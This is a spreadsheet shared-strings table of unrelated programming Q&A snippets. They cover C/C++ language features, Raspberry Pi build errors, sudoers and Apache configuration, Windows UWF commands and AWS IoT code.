# Valid log levels are (in order of verbosity): 0 (none), 1 (error), 2 (info), 3 (debug)
# Note: if you compiled with --enable-debug option, the default log level is "debug"
log_level = 1
# Manually set default device (no default)
# To set a default device, you must set both name and connstring for your device
# Note: if autoscan is enabled, default device will be the first device available in device list.</t>
  </si>
  <si>
    <t>In ISO C11 (and some extensions of ISO C++) an anonymous struct is a data member of struct type, whose members are treated as members of the enclosing struct or union.</t>
  </si>
  <si>
    <t>when running make in the directory i get:
documentation info: 
Instructions
Note: 1.Please run followed executable programs as root privilege
      2.Current Driver support versions of linux kernel range from 2.6.25 to 3.9.10
      3.Current Driver support 32bits and 64bits linux systems
Usage:
    (load or unload linux driver of CH34x)
    //compile 
    #make
    //load ch34x chips driver
    #make load
    //unload ch34x chips driver
    #make unload
I checked my kernel version using "uname -r" and got 3.8.11</t>
  </si>
  <si>
    <t>In C starting with the 2011 ISO standard (and some extensions of ISO C++) an anonymous struct is a data member of struct type, whose members are treated as members of the enclosing struct or union.</t>
  </si>
  <si>
    <t>Downloads
Latest stable C# Driver release is available via NuGet or mongo-csharp-driver releases on Github
MongoDB Server Installation Guides
 source code on GitHub
Documentation
MongoDB.org: C# and .NET Driver
Getting Started with the C# Driver
C# Driver Tutorial
C# Driver LINQ Tutorial
Serialize Documents with the C# Driver
Authenticate to MongoDB with the C# Driver
API Documentation
MongoDB.org: C# Community Projects
Related links
CSHARP feature/issue tracking on jira.mongodb.org
mongodb-user discussion on Google Groups
Related Tags
mongodb - The MongoDB Database
mongodb-query - MongoDB queries.</t>
  </si>
  <si>
    <t>(I followed this link for installation :http://www.frank-durr.de/?p=203 )
3) I configured my kernel for Raspberry Pi3,Model
B using :
4) I configured the kernel to support Fully Preemptible Kernel (RT) using 
5) I build the kernel using 
make -j$(nproc) zImage 
but I received the error: 
In file included from arch/arm/kernel/asm-offsets.c:14:0:
./include/linux/sched.h:2040:32: error: expected identifier or ( before &amp; token
#define tsk_cpus_allowed(tsk) (&amp;(tsk)-&gt;cpus_allowed)
                                ^
./include/linux/sched.h:3679:37: note: in expansion of macro tsk_cpus_allowed
static inline const struct cpumask *tsk_cpus_allowed(struct task_struct *p)
                                     ^
In file included from arch/arm/kernel/asm-offsets.c:14:0:
./include/linux/sched.h:3687:19: error: redefinition of tsk_nr_cpus_allowed
 static inline int tsk_nr_cpus_allowed(struct task_struct *p)
                   ^
In file included from arch/arm/kernel/asm-offsets.c:14:0:
./include/linux/sched.h:2042:19: note: previous definition of tsk_nr_cpus_allowed was here
Here is the kernel build output
Do you have any idea to solve this?I don't know what I am doing wrong.</t>
  </si>
  <si>
    <t>When a user invokes a branch template, Sitecore duplicates the item(s) beneath the branch template definition item, including any field values, and then performs token substitution on item names and field values in the same way as during standard item creation.</t>
  </si>
  <si>
    <t>You can have a global variable in an anonymous namespace (usable in that file only) or at file scope (usable in all files), just like you can have a class or function in an anonymous namespace.</t>
  </si>
  <si>
    <t>Class members declared as protected can be used only by the following:
Member functions of the class that originally declared these members.</t>
  </si>
  <si>
    <t>Most of compilers provide keys to disable default warnings and may provide keys to enable warnings that are disabled by default (e.g.</t>
  </si>
  <si>
    <t>I am learning about the driver and looking into the watchdog  driver code  where some value is being written to  now I guess this is the logic how driver gets its value from userspace and exposed file in user space is 
But now how actually this value from wdc_per is reached to driver, there must some callback maintained
In My case its GPIO based Watchdog driver and gpio_wdt.c may be having this callback.</t>
  </si>
  <si>
    <t>According to this principle, member variables of a class are made private to hide and protect them from other code, and can only be modified by a public member function (the mutator method), which takes the desired new value as a parameter, optionally validates it, and modifies the private member variable.</t>
  </si>
  <si>
    <t>Even when I'd just put these lines: 
on the .pro file of my QT Widget Application so that I can use opencv on that application it gives me these warnings and errors:
libEGL warning: DRI2: failed to authenticate
qt5ct: using qt5ct plugin
(rpi2:1613): GLib-GObject-WARNING **: cannot register existing type 'GtkWidget'
(rpi2:1613): GLib-GObject-CRITICAL **: g_type_add_interface_static: assertion 'G_TYPE_IS_INSTANTIATABLE (instance_type)' failed
(rpi2:1613): GLib-GObject-WARNING **: cannot register existing type 'GtkBuildable'
(rpi2:1613): GLib-GObject-CRITICAL **: g_type_interface_add_prerequisite: assertion 'G_TYPE_IS_INTERFACE (interface_type)' failed
(rpi2:1613): GLib-CRITICAL **: g_once_init_leave: assertion 'result != 0' failed
(rpi2:1613): GLib-GObject-CRITICAL **: g_type_add_interface_static: assertion 'G_TYPE_IS_INSTANTIATABLE (instance_type)' failed
(rpi2:1613): GLib-GObject-CRITICAL **: g_type_register_static: assertion 'parent_type &gt; 0' failed
I tried researching about it and what I found out that the possible reason for this could be when QT was upgraded to 5.7.0-1, the widget style GTK is not available for QT5 apps (I saw it here).</t>
  </si>
  <si>
    <t>#!/bin/bash
if [ $(id -u) != 0 ]; then
    exec sudo -- "$0" "$@"
    exit
fi
echo "Creating mongodb user"
adduser --firstuid 100 --ingroup nogroup --shell /etc/false --disabled-password --gecos "" --no-create-home mongodb
echo "Installing mongo to /opt/mongo..."
tar xfz mongo.tar.gz -C /opt --owner mongodb
echo "Creating runtime directories under /var"
install -o mongodb -g nogroup -d /var/log/mongodb/
install -o mongodb -g nogroup -d /var/lib/mongodb/
echo "Installing config scripts"
install mongod /etc/init.d
install mongodb.conf /etc
echo "Setting mongod to start on boot"
update-rc.d mongod defaults
echo "Starting mongod"
/etc/init.d/mongod start
echo "done."</t>
  </si>
  <si>
    <t>That is a struct that has simply been given no name, such as in the following case:
In the following, the struct that contains byte0 and byte1 is anonymous, and those two members become members of the enclosing union, so that things.byte0 becomes valid:
union {
  struct {
    char byte0;
    char byte1;
  };
  char bytes[2];
} things;</t>
  </si>
  <si>
    <t>Security implications of forgetting to quote a variable in bash/POSIX shells
Why does /bin/sh behave differently to /bin/bash even if one points to the other?</t>
  </si>
  <si>
    <t>It passes the sd objects current file to the pointer a directory entry object of pointer p. which then can have its attributes tested to see if they are hidden or other.</t>
  </si>
  <si>
    <t>For example, in Java, you can create an anonymous class using a special syntax that defines a class and constructs an instance of it at the same time:
The variable  holds a reference to an instance of a class which has no name in Java, but which implements the Runnable interface and can be used anywhere a Runnable instance is needed.</t>
  </si>
  <si>
    <t>not in a class); Make the functions static, as in
// Using `struct` as there is no private or protected data/functions
struct USART0
{
    static void USART0_PutNChar(...);
    ...
};
And the third alternative is to make USART0 into a namespace:
namespace USART0
{
    void USART0_PutNChar(...);
    ...
}
In these last two cases you call the functions like this:
USART0::USART0_PutNChar(...);</t>
  </si>
  <si>
    <t>I wanted to add the -fpermissive flag
Under linux here what I have done with success
The idea is tow replace the two compilers avr-gcc and avr-g++ by two bash scripts in which you add your flags (-fpermissive for me)
With root privilege:
rename the compiler "avr-gcc" (present in /usr/bin) "avr-gcc-real"
rename the compiler "avr-g++" (present in /usr/bin) "avr-gcc-g++-real"
Now create to bash scripts avr-gcc and avr-g++ under /usr/bin/
script avr-gcc contains this line:
avr-gcc-real -fpermissive $@
script avr-g++ contains this line:
avr-g++-real -fpermissive $@
As you may know $@ denotes the whole parameters passed to the script.</t>
  </si>
  <si>
    <t>DML Triggers can also divide in two groups:
Row Level Triggers (executed for each row that is affected by triggering command)
Statement Level Triggers (executed once for triggering command no matter how many rows are affected)
The trigger is mostly used for maintaining the integrity of the information on the database.</t>
  </si>
  <si>
    <t>Therefore you first have to change the owner of the executable file before you set the SUID bit (if the SUID bit is already set it will be removed and must be set again):
If the executable calls another executable (it starts other executable files using exec) the other executable will by default not be executed with changed access rights.</t>
  </si>
  <si>
    <t>It contains the following new features:
Ribbon control
Improved performance when displaying large sets of grouped data
New features for the VirtualizingPanel
Binding to static properties
Accessing collections on non-UI Threads
Synchronously and Asynchronously validating data
Automatically updating the source of a data binding
Binding to types that Implement ICustomTypeProvider
Retrieving data binding information from a binding expression
Checking for a valid DataContext object
Repositioning data as the data's values change (Live shaping)
Improved Support for Establishing a Weak Reference to an Event
New methods for the Dispatcher class
Markup Extensions for Events
source</t>
  </si>
  <si>
    <t>By the way, the code you showed would usually directly be "compiled away", because the compiler, at compile time, can determine whether the if clause could ever be executed, unless you explicitly tell the compiler to omit such safe optimizations.</t>
  </si>
  <si>
    <t>function Set-ProtectVolume($driveLetter, [bool] $enabled) {
# Each volume has two entries in UWF_Volume, one for the current session and one for the next session after a restart
# You can only change the protection status of a drive for the next session
    $nextConfig = Get-WMIObject -class UWF_Volume @CommonParams |
        where {
            $_.DriveLetter -eq "$driveLetter" -and $_.CurrentSession -eq $false
        };
# If a volume entry is found for the drive letter, enable or disable protection based on the $enabled parameter
    if ($nextConfig) {
        Write-Host "Setting drive protection on $driveLetter to $enabled"
        if ($Enabled -eq $true) {
            $nextConfig.Protect() | Out-Null;
        } else {
            $nextConfig.Unprotect() | Out-Null;
        }
    }
    =======&gt; (!)</t>
  </si>
  <si>
    <t>Navigator Object Properties
   Returns the code name of the browser 
appName   Returns the name of the browser      
appVersion    Returns the version information of the browser        
cookieEnabled Determines whether cookies are enabled in the browser 
platform        Returns for which platform the browser is compiled    
userAgent       Returns the user-agent header sent by the browser to the server    
Navigator Object Methods
javaEnabled()  Specifies whether or not the browser has Java enabled
taintEnabled()   Specifies whether or not the browser has data tainting enabled</t>
  </si>
  <si>
    <t>When the ngShow expression evaluates to false then the ng-hide CSS class is added to the class attribute on the element causing it to become hidden.</t>
  </si>
  <si>
    <t>The AUTHID clause determines whether a stored function executes with the privileges of its owner (the default) or current user</t>
  </si>
  <si>
    <t>If an object has no instance variables, or a class has no class variables, the associated monitor protects no data.</t>
  </si>
  <si>
    <t>Validity rules that allow for only
safe reattachments: An expression of a detachable type may be attached only to a variable of a detachable type, while an expression of an attached type may be attached to a variable of a type with arbitrary attachment status.</t>
  </si>
  <si>
    <t>What I have tried so far:
making the python script executable 
sudo chmod +x /var/www/newDir/test.py
now test.py has permissions -rwxr-xr-x
modifing sudoers file:
sudo visudo
and I added www-data raspberrypi=NOPASSWD: /var/www/newDir/test.py
giving Apache permission to run scripts
sudo a2enmod mpm_prefork cgi
adding right to execute CGI to the file /etc/apache2/sites-enabled/000-default.conf:
In this file inside the VirtualHost block I added:
&lt;Directory /var/www/newDir&gt;
Options +ExecCGI
&lt;/Directory&gt;
Please if you have any more ideas, describe them in more detail because I am a beginner.</t>
  </si>
  <si>
    <t>Use putty or other tool to connect with the device through SSH, and then redirect to the root of partition C:;
Get the volume information via command dir /AL,you will get the GUID for the data volume:
Run the command to protect the volume with GUID which got from last step:
uwfmgr.exe volume protect \\?\Volume {GUID}</t>
  </si>
  <si>
    <t>Be careful with this, that pointer won't be valid after the String object becomes invalid, so if the String is a variable in a function or code block, its c_str() will stop being valid when that you leave that function or code block.</t>
  </si>
  <si>
    <t>Private inheritance is a form of inheritance is which the public and protected portion of the base class becomes private in the derived class and the derived class has no access to the private members and methods of the base class.</t>
  </si>
  <si>
    <t>-- The C compiler identification is unknown
-- The CXX compiler identification is unknown
-- Check for working C compiler: /../tools/arm-bcm2708/arm-linux-gnueabihf/bin/arm-linux-gnueabihf-gcc
-- Check for working C compiler: /../tools/arm-bcm2708/arm-linux-gnueabihf/bin/arm-linux-gnueabihf-gcc -- broken
CMake Error at /usr/local/Cellar/cmake/3.14.5/share/cmake/Modules/CMakeTestCCompiler.cmake:60 (message):
  The C compiler
is not able to compile a simple test program.</t>
  </si>
  <si>
    <t>Further, you can declare Serial instance as:
#if CRIPWEB_DEBUG_BITS &amp; DEBUG_CMD
DebugWriter Serial;
#else
FakeDebugWriter Serial;
#endif
But it should be noted that Serial&lt;&lt; will still make call to function in case of FakeDebugWriter - though compiler may omit out the function call.</t>
  </si>
  <si>
    <t>It is an unordered group of elements of one type, called the element type, indexed by a set of unique keys of another type, called the key type.</t>
  </si>
  <si>
    <t>In object-oriented programming to allow access to "private" or "protected" data of a class in another class, the latter class is declared as a friend class.</t>
  </si>
  <si>
    <t>The framework API consists of:
A core set of packages and classes
A set of XML elements and attributes for declaring a manifest file
A set of XML elements and attributes for declaring and accessing
resources
A set of Intents
A set of permissions that applications can request, as well as permission enforcements included in the system
Updates to the framework API are designed so that the new API remains compatible with earlier versions of the API.</t>
  </si>
  <si>
    <t>I tried to Run a Video player example but I end up with an error which was as follows:
Starting /usr/lib/arm-linux-gnueabihf/qt5/examples/multimediawidgets/build-player-Desktop-Debug/player...
      libEGL warning: GLX/DRI2 is not supported
      libEGL warning: DRI2: failed to authenticate
(player:841): GStreamer-CRITICAL **: gst_object_ref_sink: assertion 'GST_IS_OBJECT (object)' failed
      GStreamer; Unable to play - "file:///home/pi/Desktop/test_video.mp4"
      GStreamer; Unable to play - "file:///home/pi/Desktop/test_video.mp4"
      Warning: "No decoder available for type 'video/quicktime, variant=(string)iso'."</t>
  </si>
  <si>
    <t>An anonymous function enables definition of a function without binding to an identifier.</t>
  </si>
  <si>
    <t>As per example on github: https://github.com/raspberry-sharp/raspberry-sharp-io/wiki/Raspberry.IO.GeneralPurpose
Code:
on line  I get exception:
"Operation is not valid due to the current state of the object"
Stack trace
Unhandled Exception:
System.InvalidOperationException: Operation is not valid due to the current state of the object
at Raspberry.IO.GeneralPurpose.GpioConnectionDriver..ctor () [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnectionSettings.get_DefaultDriver () [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnectionSettings..ctor () [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnection..ctor (Raspberry.IO.GeneralPurpose.GpioConnectionSettings settings, IEnumerable`1 pins) [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnection..ctor (Raspberry.IO.GeneralPurpose.PinConfiguration[] pins) [0x00000] in &lt;filename unknown&gt;:0
at Hello.Program.Main (System.String[] args) [0x00000] in &lt;filename unknown&gt;:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.InvalidOperationException: Operation is not valid due to the current state of the object
at Raspberry.IO.GeneralPurpose.GpioConnectionDriver..ctor () [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnectionSettings.get_DefaultDriver () [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnectionSettings..ctor () [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnection..ctor (Raspberry.IO.GeneralPurpose.GpioConnectionSettings settings, IEnumerable`1 pins) [0x00000] in &lt;filename unknown&gt;:0
at Raspberry.IO.GeneralPurpose.GpioConnection..ctor (Raspberry.IO.GeneralPurpose.PinConfiguration[] pins) [0x00000] in &lt;filename unknown&gt;:0
at Hello.Program.Main (System.String[] args) [0x00000] in &lt;filename unknown&gt;:0
I am able to switch pin state with Python so nothing is wrong with device.</t>
  </si>
  <si>
    <t>Since non-static member functions have a hidden parameter (the this pointer), they are not signature-compatible with non-member functions.</t>
  </si>
  <si>
    <t>Because simple assignment throws an error:
wifi_config_t wifi_config = {
  .sta = {
    .ssid = wifi_ssid,
    .password = wifi_pass,
    .bssid_set = 0
  },
};
error: missing braces around initializer [-Werror=missing-braces]
when I try to strcpy values, I got:
error: pointer targets in passing argument 1 of 'strcpy' differ in signedness [-Werror=pointer-sign]
         strcpy(wifi_config.sta.password,wifi_pass);
Best Regards
Marek</t>
  </si>
  <si>
    <t>Default is the current page
username: Specifies a username to be used in an HTTP access authentication request
xhr: A function used for creating the XMLHttpRequest object
Example:
Sets the defaults for Ajax requests to the url "/xmlhttp/", disables global handlers and uses POST instead of GET.</t>
  </si>
  <si>
    <t>Graph API supports the following common operations for a user object:
Create a new user in a directory
Get a users detailed properties, such as their groups
Update a users properties, such as their location and phone number,
or change their password
Check a users group membership for role-based access
Disable a users account or delete it entirely
In addition to user objects, you can perform similar operations on other objects such as groups and applications.</t>
  </si>
  <si>
    <t>If a designator has the form
.identifier
  then the current object (defined below) shall have
  structure or union type and the identifier shall be the name of a
  member of that type.</t>
  </si>
  <si>
    <t>#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# Host alias specification
www-data ALL = NOPASSWD: /var/www/bash.sh
# User alias specification
# Cmnd alias specification
# User privilege specification
root    ALL=(ALL:ALL) ALL
# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on "#include" directives:
#includedir /etc/sudoers.d
pi ALL=(ALL) NOPASSWD: ALL</t>
  </si>
  <si>
    <t>Note that for maximum compatibility of existing scripts, Greasemonkey recommends that you switch to Tampermonkey or Violentmonkey:
As mentioned in the main post, Greasemonkey 4 is changing how it runs user scripts.</t>
  </si>
  <si>
    <t>When encrypting an XML element or element content the EncryptedData element replaces the element or content (respectively) in the encrypted version of the XML document.</t>
  </si>
  <si>
    <t>A group can be have 1 of 3 designations:
Secret: only current members can see or access the group
Closed: the group is publicly visible, but only members can access information
Open: publicly visible and accessible</t>
  </si>
  <si>
    <t>In OOP, "friendship" is providing access to private and protected members of a class from another class or non-member function.</t>
  </si>
  <si>
    <t>I want to enable -Wall option (since it enables lot of other warnings) but disable only -Wimplicit-function-declaration option.</t>
  </si>
  <si>
    <t>The protected keyword specifies access to class members in the member-list up to the next access specifier (public or private) or the end of the class definition.</t>
  </si>
  <si>
    <t>(sorry for my bad english)
I did the follow istructions:
https://support.google.com/domains/answer/6147083?hl=it
(i made a dynamic dns)
i made a script in linux with: 
https://username:password@domains.google.com/nic/update?hostname=www.systemcamera.org
i hoped it's ok, but the domain doesn't works, when i type www.systemcamera.org doesn't works, but when i type the ip address it's works
in the script i typed: 
wget
  https://username:pswd.google.com/nic/update?hostname=www.systemcamera.org
  -O dns_update_result$
i runned (./script), but i don't find my website 
the result when i run the script:
--2018-06-26 13:14:31--  https://5RodFTlBOsTBB1gL:password@domains.google.com/nic/update?hostname=www.systemcamera.org
  Resolving domains.google.com (domains.google.com)... 172.217.23.110, 2a00:1450:4002:800::200e
  Connecting to domains.google.com (domains.google.com)|172.217.23.110|:443... connected.</t>
  </si>
  <si>
    <t>Classes derived with public or protected access from the class that originally declared these members.</t>
  </si>
  <si>
    <t>Furthermore, at least one of the following must be true, or otherwise a compile-time error occurs:
An identity (6.1.1), implicit nullable (6.1.4), implicit reference (6.1.6), boxing (6.1.7), explicit nullable (6.2.3), explicit reference (6.2.4), or unboxing (6.2.5) conversion exists from E to T.
The type of E or T is an open type.</t>
  </si>
  <si>
    <t>cppreference:
 is a smart pointer that retains sole ownership of an object through a pointer and destroys that object when the unique_ptr goes out of scope.</t>
  </si>
  <si>
    <t>When you have added an instance of the ibmiot node to a flow, you need to make sure that you:
Specify a value for the Authentication property of API Key
Specify an API Key that you have created in your Watson IoT Platform Org
Specify a value for the Input Type property of Device Event
You can define specific values for the Device Type, Device Id and Event properties if you are interested in specific events... or use wildcards.</t>
  </si>
  <si>
    <t>In OOP, "friendship" is providing access to private and protected members of a class from another class (a "friend") or non member function.</t>
  </si>
  <si>
    <t>I'm pretty sure in your case there will be a permission denied error, since normally the /dev/tty* belong to group dialout and they have group write permission by default, but since probably your user doesn't belong to that group you don't have write access to /dev/ttyACM0.</t>
  </si>
  <si>
    <t>The last part of the topic is your rootCA cert id in the AWS IoT
And the lambda looks like:
var AWS = require('aws-sdk');
exports.handler = function(event, context, callback) {
var region = "us-east-1";
var accountId = event.awsAccountId.toString().trim();
var iot = new AWS.Iot({
    'region': region,
    apiVersion: '2015-05-28'
});
var certificateId = event.certificateId.toString().trim();
var certificateARN = `arn:aws:iot:${region}:${accountId}:cert/${certificateId}`;
var policyName = &lt; Policy name &gt; ;
//Asign IoT Policy to certificate
iot.attachPrincipalPolicy({
    policyName: policyName,
    principal: certificateARN
}, (err, data) =&gt; {
    if (err &amp;&amp; (!err.code || err.code !== 'ResourceAlreadyExistsException')) {
        callback(err, data);
        return;
    }
    //Active the certificate
    iot.updateCertificate({
        certificateId: certificateId,
        newStatus: 'ACTIVE'
    }, (err, data) =&gt; {
        if (err) callback(err, data);
        else iot.createThing(params, function(err, data) {//Create a thing for this certificate
            if (err) callback(err, null);
            else {
                var params = {
                    principal: certificateARN,
                    thingName: &lt;NAME&gt;
                };
                //Attach certificate to this thing
                iot.attachThingPrincipal(params, function(err, data) {
                    if (err) callback(err, null);
                    else callback(null, "SUCCESS");
                });
            }
        });
    });
});
}
And this is all.</t>
  </si>
  <si>
    <t>This attribute informs the system that you have tested against the target version and the system should not enable any compatibility behaviors to maintain your app's forward-compatibility with the target version.</t>
  </si>
  <si>
    <t>I had to add the Debian Sid mirror to my /etc/apt/sources.list, and then run the following commands to make my system "trust" the Debian repositories:
Then I did sudo apt update, and then sudo apt install python-pyqt5.qtwebengine.</t>
  </si>
  <si>
    <t>and class) as criteria to build selectors
Events
Effects and animations
AJAX
JSON parsing (for older browsers)
Extensibility through plug-ins
Utilities such as user agent information, feature detection
Compatibility methods that are natively available in modern browsers but need fallbacks for older ones - For example the inArray() and each() functions
Multi-browser (not to be confused with cross-browser) support
Browser Support
jQuery supports the current stable version, and the preceding version or "current - 1 version," of Chrome, Edge, Firefox, and Safari.</t>
  </si>
  <si>
    <t>It may be compatibility issue of your Logitech webcam.Please reference Hardware compatibility list.You can try to install the driver of your Logitech webcam manually, or choose a compatibility webcam and then try again.How to install usb webcam drivers please see here.</t>
  </si>
  <si>
    <t>Key Value Coding is a mechanism for accessing an objects properties indirectly, using strings to identify properties, rather than through invocation of an accessor method or accessing them directly through instance variables.</t>
  </si>
  <si>
    <t>Upon restart, the following commands were ran from a remote SSH session:
uwfmgr.exe volume protect c:
uwfmgr.exe volume protect u:
uwfmgr.exe filter enable
shutdown -r -t 0
When the device restarts, the "Your PC ran into a problem and needs to restart.</t>
  </si>
  <si>
    <t>Once you have the DeviceInformation you can pair as follows:
var pairingResult = 
    await i.Pairing.PairAsync(DevicePairingProtectionLevel.Encryption);
As for unpairing, you need to make sure your project targets Build 10586
or any later version in the project properties windows:  
Then you'll be able to call UnPairAsync:  
await i.Pairing.UnpairAsync();
Older builds do not support UnpairAsync.</t>
  </si>
  <si>
    <t>If all you want to do is execute a Python script from PHP - assuming you have already written the script and stored it somewhere:
First, assign execute permissions on the Python script to the user that is running the PHP code.</t>
  </si>
  <si>
    <t>The ~/.bash_profile only gets executed within a login shell unlike ~/.bashrc which gets executed when you run bash using an interactive shell.</t>
  </si>
  <si>
    <t>There's no stack trace in java, but here's the XCode Organizer Device Log:
Incident Identifier: 2EEFF4F0-9031-4798-80E7-69F55BB70576
CrashReporter Key:   08d7c27d21cb15553295bbae1b2aa2040e94b517
Hardware Model:      iPhone3,1
Process:             iOS_RVM_NN [1972]
Path:                /var/mobile/Applications/B2571332-7C2F-4A5A-8932-8BF5EC94EE33/iOS_RVM_NN.app/iOS_RVM_NN
Identifier:          iOS_RVM_NN
Version:             1 (1.0)
Code Type:           ARM (Native)
Parent Process:      debugserver [1971]
Date/Time:           2014-12-02 11:22:50.710 -0500
OS Version:          iOS 7.1.2 (11D257)
Report Version:      104
Exception Type:  EXC_CRASH (SIGSEGV)
Exception Codes: 0x0000000000000000, 0x0000000000000000
Triggered by Thread:  0
Thread 0 Crashed:
0   libsystem_kernel.dylib          0x39838a58 mach_msg_trap + 20
1   libsystem_kernel.dylib          0x39838854 mach_msg + 44
2   CoreFoundation                  0x2eaa2846 __CFRunLoopServiceMachPort + 150
3   CoreFoundation                  0x2eaa0fb2 __CFRunLoopRun + 850
4   CoreFoundation                  0x2ea0beba CFRunLoopRunSpecific + 518
5   CoreFoundation                  0x2ea0bc9e CFRunLoopRunInMode + 102
6   GraphicsServices                0x3391165e GSEventRunModal + 134
7   UIKit                           0x31358148 UIApplicationMain + 1132
8   iOS_RVM_NN                      0x007b024e 0x8c000 + 7488078
9   iOS_RVM_NN                      0x007af7e2 0x8c000 + 7485410
10  iOS_RVM_NN                      0x007af822 0x8c000 + 7485474
11  iOS_RVM_NN                      0x00344afe 0x8c000 + 2853630
12  iOS_RVM_NN                      0x00953ca0 0x8c000 + 9206944
13  iOS_RVM_NN                      0x0094cbfa 0x8c000 + 9178106
14  iOS_RVM_NN                      0x0094e876 0x8c000 + 9185398
15  iOS_RVM_NN                      0x0094e8d0 0x8c000 + 9185488
16  iOS_RVM_NN                      0x00948ce6 0x8c000 + 9161958
17  iOS_RVM_NN                      0x009417ae 0x8c000 + 9131950
18  iOS_RVM_NN                      0x00212f84 0x8c000 + 1601412</t>
  </si>
  <si>
    <t>An alternative which is more secure and may fix your problem is to install Userdir
Then you need to make a directory in home
Restart Apache
sudo service apache2 restart
If you want to change the home directory apache points to you can do so in /etc/apache2/mods-enabled/userdir.conf .Then change the &lt;Directory /home/*/public_html&gt; to the directory you want.</t>
  </si>
  <si>
    <t>I/AWS: Certificate loading complete
D/OpenGLRenderer: Render dirty regions requested: true
I/Adreno-EGL: &lt;qeglDrvAPI_eglInitialize:410&gt;: EGL 1.4 QUALCOMM build: AU_LINUX_ANDROID_LA.BF.1.1.1_RB1.05.00.02.042.013_msm8974_LA.BF.1.1.1_RB1__release_AU ()
              OpenGL ES Shader Compiler Version: E031.25.03.00
              Build Date: 01/21/15 Wed
              Local Branch: mybranch7061829
              Remote Branch: quic/LA.BF.1.1.1_rb1.7
              Local Patches: NONE
              Reconstruct Branch: AU_LINUX_ANDROID_LA.BF.1.1.1_RB1.05.00.02.042.013 +  NOTHING
I/OpenGLRenderer: Initialized EGL, version 1.4
D/OpenGLRenderer: Enabling debug mode 0
D/Atlas: Validating map...
W/IInputConnectionWrapper: showStatusIcon on inactive InputConnection
I/Timeline: Timeline: Activity_idle id: android.os.BinderProxy@25603903 time:661926148</t>
  </si>
  <si>
    <t>For classes, the monitor protects the class's class variables.</t>
  </si>
  <si>
    <t>My base script use a simple query "INSERT INTO...." but in top of the script there are in clear the credentials to connect on database:
conn = MySQLdb.connect(host="192.168.1.123", user="root", passwd="Pa$$w0rd", db="mydb")
I do not want anyone reading the python script can access the database directly.</t>
  </si>
  <si>
    <t>(null coalesce) operator
scalar type declarations
Anonymous classes 
Generator Return Expressions 
Generator delegation
Session options
CSPRNG (Cryptographically Secure PseudoRandom Number Generator)
Spaceship Operator ( &lt;=&gt; )
...
PHP7 migration guide
There's a whole section on Migrating from PHP 5.6.x to PHP 7.0.x in the manual:
Backward incompatible changes
New features
Changes in SAPI Modules
Deprecated features in PHP 7.0.x
Changed functions
New functions
New Classes and Interfaces
New Global Constants
Removed Extensions and SAPIs
Other Changes
 1997-2015, The PHP Documentation group, CC-BY 3.0
Information
For global question on PHP, please use the generic tag: php
If you want to talk about PHP or if you have a question, you can come to the PHP chat room</t>
  </si>
  <si>
    <t>To ensure, that child process gets killed on oJob.kill, you need to group them all under one process group and make shell process, the group leader.</t>
  </si>
  <si>
    <t>Thus, a dynamic proxy class can be used to create a type-safe proxy object for a list of interfaces without requiring pre-generation of the proxy class, such as with compile-time tools.</t>
  </si>
  <si>
    <t>Normally all other interrupts are enabled, so other interrupts are serviced, but the current line is always disabled.</t>
  </si>
  <si>
    <t>When false, the ng-hide CSS class is removed from the element causing the element not to appear hidden.</t>
  </si>
  <si>
    <t>When true, the ng-hide CSS class is removed from the element causing the element not to appear hidden.</t>
  </si>
  <si>
    <t>For objects, the associated monitor protects the object's instance variables.</t>
  </si>
  <si>
    <t>Running the following python script through web site works fine and (as expected) stops the playback of MPD:
This script however causes an error (playback starts as expected):
The error is:
malformed header from script.</t>
  </si>
  <si>
    <t>Next, you'll want to implement an event handler for PropertyChanged in your Thread classes like so (I recommend making either an interface or base class that handles this since you appear to be using different classes for each Thread):
The lock statement is used so that the thread is blocked when another thread is reading or writing to MyDevices.</t>
  </si>
  <si>
    <t>The IDE does not know about namespaces
As a consequence it does not touch anything inside namespaces
An empty namespace name is admissible this will establish an anonymous namespace.</t>
  </si>
  <si>
    <t>My descriptor is as follows:
In a bash script on the Raspberry Pi that runs at boot I am setting the following as the VID and PID:
This is the code used to try and access the HID device:
private async void EnumerateHidDevices()
{
    ushort vendorId = 0x045E;
    ushort productId = 0x0610;
    ushort usagePage = 0xFFAA;
    ushort usageId = 0x01;
    string selector =
            HidDevice.GetDeviceSelector(usagePage, usageId, vendorId, productId);        
    var devices = await DeviceInformation.FindAllAsync(selector);
    if (devices.Any())
    {
        Debug.WriteLine("HID devices found: " + devices.Count);
    }
    else
    {
        Debug.WriteLine("HID device not found");
    }
}
In the Package.appxmanifest I have included the following:
&lt;DeviceCapability Name="humaninterfacedevice"&gt;
    &lt;Device Id="vidpid:045E 0610"&gt;
      &lt;Function Type="name:vendorSpecific" /&gt;
    &lt;/Device&gt;
&lt;/DeviceCapability&gt;
&lt;DeviceCapability Name="usb"&gt; 
    &lt;Device Id="vidpid:045E 0610"&gt;
        &lt;Function Type="classId:ff * *"/&gt;
        &lt;!--&lt;Function Type="name:vendorSpecific"/&gt;--&gt;
    &lt;/Device&gt;
&lt;/DeviceCapability&gt;</t>
  </si>
  <si>
    <t>C# 7.3 introduced features that enable safe code to be as performant as unsafe code, new compiler options, the usage of out variable declarations in field, property and constructor initializers, and some more.</t>
  </si>
  <si>
    <t>Make sure you have that in your list of keys in your SELECT statement
Make sure your data type for the primary partition key matches the type you are passing in - for example if your primary partition key was  DeviceId, it should be a string type (not, for example, an Integer)
CloudWatch logs will provide much more detailed information to assist you.</t>
  </si>
  <si>
    <t>Value types, in particular, would allow for "simple" object instances to do away with what is called their "object identity"; indeed, even a bare-bones  in Java brings along with it some metadata (its identity) which, in most case, will not be used (consider that each instance is usable as a monitor; see synchronized); this project would allow to leave this identity behind where it is not needed.</t>
  </si>
  <si>
